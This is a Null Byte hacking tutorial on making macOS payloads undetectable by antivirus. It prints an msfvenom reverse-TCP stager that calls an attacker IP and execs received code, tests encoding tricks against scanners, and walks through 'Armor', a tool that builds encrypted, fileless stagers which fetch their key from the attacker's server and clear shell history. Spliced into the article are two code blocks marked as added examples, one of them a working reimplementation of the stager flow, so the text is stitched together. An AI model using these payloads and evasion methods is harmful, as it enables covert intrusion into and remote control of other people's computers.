
Creating an Undetectable Payload « Null Byte :: WonderHowTo



Encrypting payloads and encoding stagers is more effective than you might think. With a few simple tricks it is surprisingly easy to bypass VirusTotal and macOS antivirus software.

The goal of this project was to find a known, easily detected macOS payload and then find a method of executing the exact same payload on the target MacBook without detection. That would reliably confirm whether a given bypass method works against known payloads. In addition to being tested against VirusTotal, the malicious files were tested on macOS Mojave (10.14) against popular antivirus products: Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers shouldn't confuse this topic with bypassing Gatekeeper or System Integrity Protection (SIP). Running an unsigned application and evading virus scanners are two different subjects. The focus of this article is on bypassing detection by antivirus software and VirusTotal. As we'll see below, in most cases simply encoding a payload is enough to evade antivirus detection.

Base64 Encoding Basics

Encoding as an antivirus evasion technique is (usually) a terrible idea, because encoded strings are trivial to decode and identify. Nonetheless, encoding Python and Bash scripts is common practice in projects like Empire and msfvenom. It lets developers execute complex scripts without worrying about special characters that could corrupt the payload or cause it to fail.

Let's talk about base64 encoding for a minute and look at the following strings.

  echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of these strings can be decoded with the following command (the decode flag is -d on Kali and -D on macOS):

  base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Note that the end of each string changes slightly while the beginning stays the same. The same is true of most msfvenom payloads. If only the IP address and port number change, the beginning of the generated base64-encoded payload is identical for every hacker and pentester using msfvenom. Below is an msfvenom payload generated with the IP address 10.42.0.1:

  aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The msfvenom output below uses the same payload, but with a different IP address, 192.168.0.2:

  aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

Notice that the beginning of the string is identical in both cases, and the same holds for every msfvenom payload of this type. One would expect antivirus software to at least flag such common base64 prefixes, if not decode them and parse the result for malicious code. It does not.

Single Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus software would actually detect was a challenge. After a quick search for popular "hacking macOS" articles, a three-year-old Null Byte article by community member psytech140 offered a simple msfvenom payload. Running the following command produced the output shown below it:

  msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64-encoded Python one-liner that connects back to Metasploit. Saving the one-liner to a file named "thisfileisevil.py" and uploading it to VirusTotal resulted in a detection rate of 4/58.

This detection rate is surprisingly low. Decoding the embedded base64 string reveals that the Python script connects to a remote server (10.42.0.1) on port 4444.

  base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving the decoded Python code above to a file named "thisfileisevil_without_encoding.py" and uploading it to VirusTotal resulted in a detection rate of 1/56.

Interestingly, the raw Python code received an even lower detection rate.

At this point it isn't clear what VirusTotal and antivirus software are actually trying to detect. They do a poor job of decoding base64 strings, and an equally poor job of flagging the 13 lines of msfvenom-generated Python that thousands of pentesters and hackers have used over the years.

Double Base64 Encoded Payloads

If a single-encoded payload gets past most antivirus software, double encoding should be an effective technique too, right? Not quite. Encoding the already encoded msfvenom output and uploading it to VirusTotal resulted in 1/54 detections.

Again, a single detection, 1/54, and by Microsoft, which doesn't even ship antivirus software for macOS. The double-encoded file was produced by base64-encoding the msfvenom output, the exact same payload that was detected earlier:

  cat thisfileisevil.py | base64

On the target MacBook, the double-encoded string is decoded with base64 -D and the result is passed directly to python -c. That Python one-liner in turn decodes the inner payload and creates the reverse TCP connection.

To my surprise, both VirusTotal and the popular antivirus products were bypassed this way. Not one of the tested antivirus products detected the double-encoded payload, whether it was saved as a text file or embedded in AppleScript code.

Encrypted Payloads

So far, we've learned that single- and double-encoded payloads bypass detection by most antivirus software (though raw, unencoded code does even better). However, encoding scripts and payloads invites a cat-and-mouse game between hackers and antivirus developers. It's only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners begin recursively decoding base64 strings and looking for commonly encoded signatures.

This led me to think about a more reliable way to beat macOS antivirus, a solution that is a bit harder to detect and prevent. Encrypting the payload, rather than merely encoding it, offers a better way of evading antivirus scanners.

Why Is Encryption Better Than Encoding?

The main weakness of encoding is that antivirus software could simply keep decoding base64 strings until it reaches the embedded payload. No matter how many times an attacker encodes the payload, it can be reconstructed. With an encrypted payload, antivirus software is left with a string of unreadable data. The encrypted payload cannot be scanned by AV software or read by a human, not without the decryption key.
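To make the argument of the last few paragraphs concrete, here is the recursive base64 scanner that the article says antivirus engines are not running, written as an added example (it is not code from the article, from Armor or from any antivirus product). It joins each layer into one line, decodes the first long base64 run, and checks the result for fragments of the decoded msfvenom stager that stay the same whatever LHOST and LPORT are. The sample files it scans are constructed inside the script: an abbreviated stand-in for the stager, the single-encoded one-liner shape msfvenom emits, the double-encoded "cat file | base64" form, and a stand-in for an Armor-style ciphertext that is not real AES output. It assumes GNU or BSD grep, tr and base64 (on macOS the decode flag is -D, as in the article).

```shell
#!/bin/sh
# Added example, not from the article: recursive base64 scanner with
# constructed samples.  Assumes GNU/BSD grep, tr, base64 (macOS: base64 -D).
set -e

MAX_DEPTH=5

# Fixed strings copied from the decoded stager shown in the article.
INDICATORS="socket.socket(2,socket.SOCK_STREAM)
struct.unpack('>I',s.recv(4))
exec(d,{'s':s})"

# has_indicator FILE -> succeeds if any indicator occurs in FILE
has_indicator() {
    printf '%s\n' "$INDICATORS" | grep -qaF -f - "$1"
}

# first_b64_run FILE -> prints the first run of 40+ base64 characters after
# stripping whitespace, so a blob wrapped at 76 columns counts as one candidate
first_b64_run() {
    tr -d ' \t\r\n' < "$1" | grep -aoE '[A-Za-z0-9+/]{40,}={0,2}' | head -n 1
}

# encoding_depth FILE -> prints the number of base64 layers peeled before the
# stager became visible (0 = plaintext), or "none" if it never did
encoding_depth() {
    work=$(mktemp)
    cp "$1" "$work"
    depth=0
    result=none
    while [ "$depth" -le "$MAX_DEPTH" ]; do
        if has_indicator "$work"; then
            result=$depth
            break
        fi
        run=$(first_b64_run "$work")
        [ -n "$run" ] || break
        # Ciphertext decodes to bytes that contain neither the stager nor another run.
        printf '%s' "$run" | base64 -d > "$work" 2>/dev/null || break
        depth=$((depth + 1))
    done
    rm -f "$work"
    printf '%s\n' "$result"
}

# --- constructed samples ---------------------------------------------------
# Abbreviated stand-in for the decoded stager (same indicator lines, fewer lines).
write_raw_sample() {
    cat > "$1" <<'EOF'
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('10.42.0.1',4444))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
exec(d,{'s':s})
EOF
}

# The shape msfvenom emits: a one-liner that decodes the blob and execs it.
write_single_sample() {
    raw=$(mktemp)
    write_raw_sample "$raw"
    printf "import base64,sys;exec(base64.b64decode('%s'))\n" \
        "$(base64 < "$raw" | tr -d '\n')" > "$1"
    rm -f "$raw"
}

# "cat thisfileisevil.py | base64": the whole single-encoded file, line-wrapped.
write_double_sample() {
    single=$(mktemp)
    write_single_sample "$single"
    base64 < "$single" > "$1"
    rm -f "$single"
}

# Stand-in for Armor's output (not real AES output): the "Salted__" header that
# openssl enc writes, followed by bytes that are not text of any kind.
write_encrypted_sample() {
    { printf 'Salted__'; i=0; while [ "$i" -lt 32 ]; do printf '\200\377'; i=$((i + 1)); done; } | base64 > "$1"
}
```

Run `encoding_depth` on the four sample files and it reports 0, 1, 2 and none: the raw script, the msfvenom one-liner and the double-encoded file all give up the stager within two decodes, while the ciphertext stand-in decodes to bytes that match nothing and contain no further base64 run, which is exactly the property the next section relies on.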

This brings me to Armor, a simple shell script I created to show how encrypting macOS payloads can be automated and how the result is executed.

How the Armor Script Works

Armor encrypts the contents of any file it is given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language macOS supports. The contents of the file are encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and fetched by the target MacBook to decrypt the payload.

Below is an example of using Armor with a simple Netcat payload.

There are several things happening in this GIF. I'll explain each step in order.

1. A Netcat listener is started on port 4444.
2. The payload.txt file is read. It contains a simple Bash one-liner that, when executed, establishes a TCP connection from the target MacBook to the attacker's Netcat listener.
3. Armor is used to encrypt the Bash one-liner.
4. Ncat is used to host the decryption key on the attacker's server.
5. When the stager is executed on the target MacBook (not shown in the GIF), the Bash one-liner is decrypted and executed without writing anything to disk.
6. Ncat stops listening immediately after the key has been fetched.
7. Once the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of the script's functions, and of how commands are executed without writing data to the target's disk, see the comments in the script on my GitHub page. Readers who want a quick test run of Armor can do the following:

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the following command:

  git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly created Armor/ directory.

  cd Armor/

Then give the armor.sh script permission to execute.

  chmod +x armor.sh

Step 2: Create the Payload

In my example GIF, a Bash one-liner was used to create a TCP connection. To keep this walkthrough simple, we'll encrypt a trivial command, ls.

Use the following command to create the payload.txt file:

  echo 'ls -la' > /tmp/payload.txt

Step 3: Encrypt the payload with Armor

Now encrypt the contents of payload.txt with Armor using the following command:

  ./armor.sh /tmp/payload.txt 1.2.3.4 443

[Armor ASCII-art banner, created by @tokyoneon_]

[+] Generated encryption key: /root/Armor/payload.txt_5c6c.key
[+] Encrypted payload: /root/Armor/payload.txt_5c6c.enc
[+] Generated SSL certificate: /root/Armor/payload.txt_5c6c.crt
[+] Generated SSL key: /root/Armor/payload.txt_5c6c_ssl.key
[+] Stager saved: /root/Armor/payload.txt_5c6c_stager.txt

[!] Run on the target MacBook:

bash -c "$(bash -c "$(printf '%s' 'YjAxMjMyZTU2ZTFhNDAxMDFlY2FlNjlkPi9kZXYvbnVsbCAyPiYxOyBvcGVuc3NsIGVuYyAtZCAt
YWVzLTI1Ni1jYmMgCS1pbiA8KHByaW50ZiAnJXMnICdVMkZzZEdWa1gxL29jU0tsUkdIRmZncmd1
YjlLV3JJdFlORldvNGplMzVFZTVXbTNUVytpWnA1RlVLc1o2NXBjdGt6bkdyK0gxUUo5eUtrYk8v
MXhTUT09JyB8IGJhc2U2NCAtRCkgCS1wYXNzIGZpbGU6PChjdXJsIC1zIC0taW5zZWN1cmUgaHR0
cHM6Ly8weDBBMkEwMDAxOjQ0Myk=' | base64 -D)")"; history -c

[!] Start the Ncat listener now? y/N

[!] Starting Ncat listener:

The address 1.2.3.4 is the attacker's IP address, where the decryption key will be hosted. It can be a local address (for example, 192.168.1.2) or the address of a virtual private server. The Ncat server uses this address and port number (443) to serve the decryption key. Port 443 can be replaced with any port available on the attacker's Kali Linux system.

If LibreSSL (the flavor of OpenSSL used by macOS) is not found on Kali, Armor will try to install it. Unfortunately, the version of OpenSSL shipped with Kali/Debian is not compatible with macOS's LibreSSL.

Step 4: Start the Ncat Listener

Before running the stager, start the Ncat listener. Armor will try to start it automatically:

  [+] Ncat active for stager: payload.txt_e856 ...
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Step 5: Execute the Stager

Armor generates an encrypted and encoded command intended for the target MacBook. This stager can be embedded in an AppleScript for USB drop attacks, used in USB Rubber Ducky attacks, or delivered through other social engineering. For now, we'll simply paste the stager into a terminal on the MacBook.

When the stager runs, the MacBook terminal lists (ls) all (-a) files in the current directory in long (-l) format.

We encrypted a trivial ls command. Now imagine applying the same level of obfuscation to a sophisticated Python script designed to carry out a variety of advanced attacks. Antivirus software currently doesn't decode base64 strings, and even if it did, the embedded, encrypted payload would be unreadable without the key.
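The whole flow of steps 2 to 5, reduced to its essentials, as an added example that is not Armor's own code: a one-time key, AES-256-CBC through openssl enc, a base64-wrapped decrypt command, and an outer bash -c that executes whatever the decrypt command prints, so the plaintext payload never touches the target's disk. Two assumptions differ from Armor. The command the target uses to obtain the key is supplied by the caller (Armor fetches it with curl -s --insecure https://IP:PORT from its Ncat listener; the demo and test use cat of the local key file so everything runs offline), and GNU base64 -d is used where macOS needs -D, as in the article.

```shell
#!/bin/sh
# Added example, not Armor's own code: encrypt-then-stage flow of steps 2 to 5.
# KEY_COMMAND is an assumption: Armor uses "curl -s --insecure https://IP:PORT",
# the test below uses "cat" of the local key file.  GNU base64 -d; macOS uses -D.
set -e

# armor_encrypt PAYLOAD_FILE -> prints "KEYFILE ENCFILE"
armor_encrypt() {
    payload="$1"
    tag=$(openssl rand -hex 2)
    keyfile="${payload}_${tag}.key"
    encfile="${payload}_${tag}.enc"
    openssl rand -hex 32 > "$keyfile"
    # -md sha256 pins the password-to-key derivation so both ends agree on it
    # whatever openssl/LibreSSL version each side runs.
    openssl enc -aes-256-cbc -md sha256 -salt -in "$payload" -out "$encfile" \
        -pass "file:$keyfile" 2>/dev/null
    printf '%s %s\n' "$keyfile" "$encfile"
}

# build_stager ENCFILE KEY_COMMAND -> prints the one-line stager for the target.
# Inner bash -c: decrypt the embedded ciphertext with the key KEY_COMMAND returns.
# Outer bash -c: execute the decrypted text, which never touches disk.
build_stager() {
    encfile="$1"
    key_command="$2"
    ciphertext_b64=$(base64 < "$encfile" | tr -d '\n')
    decrypt_cmd="openssl enc -d -aes-256-cbc -md sha256 -in <(printf '%s' '$ciphertext_b64' | base64 -d) -pass file:<($key_command) 2>/dev/null"
    stager_b64=$(printf '%s' "$decrypt_cmd" | base64 | tr -d '\n')
    printf "bash -c \"\$(bash -c \"\$(printf '%%s' '%s' | base64 -d)\")\"\n" "$stager_b64"
}

# run_stager STAGER -> what the target does with the pasted line
run_stager() {
    eval "$1"
}

# Demo: PAYLOAD=/tmp/payload.txt sh armor_demo.sh
if [ -n "${PAYLOAD:-}" ]; then
    files=$(armor_encrypt "$PAYLOAD")
    key=${files%% *}
    enc=${files#* }
    echo "[+] Generated encryption key: $key"
    echo "[+] Encrypted payload: $enc"
    echo "[!] Stager (key served by 'cat $key' here; Armor fetches it with curl):"
    build_stager "$enc" "cat $key"
fi
```

Note the two things that make this work on the target without a file write: process substitution (<(...)) hands openssl the ciphertext and the key as file descriptors, and the outer bash -c receives the plaintext only as an argument string. Pinning -md sha256 on both sides sidesteps the kind of OpenSSL-versus-LibreSSL mismatch the article mentions, since the two have not always agreed on the default digest used to turn the password into the AES key.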

Improving the Attack

Armor is far from perfect. It's a proof of concept, and hopefully readers will find room for improvement. An alternative to LibreSSL, for instance: since it isn't installed by default on most Debian and Kali systems, it is a somewhat awkward choice of encryption tool.

Hosting the decryption key on the attacker's server is risky. If the attacker's IP address is discovered in the stager, it may be possible to enumerate the key's file name and download it. The key would allow the target to reconstruct the encrypted payload and learn exactly what was done to the MacBook.

Transmitting the decryption key over UDP port 53 would be more likely to evade firewall detection, and would make the exchange harder for deep packet inspection (DPI) to recognize, rendering the whole thing that much more "undetectable".

Finally, a way of encrypting the payload that doesn't depend on the target having internet access (to download the decryption key) would be a worthwhile improvement.

Final Thoughts

After testing these attacks against VirusTotal and at least six popular antivirus products, not one double-encoded payload was detected. macOS antivirus scanners appear to be nearly oblivious even to the most common single-encoded payloads, and detecting something produced with Armor proves harder still for today's macOS antivirus scanners.

In addition, macOS relies on Gatekeeper to prevent malicious applications from being opened. As shown in a previous article, Gatekeeper protections are not applied to files on USB drives inserted into the MacBook, so targets can be socially engineered into opening malicious files.

To learn how to proactively defend against such attacks, readers should refer to the "How to Protect Yourself" section of the macOS attacks article.


Title image and screenshots by tokyoneon/Null Byte
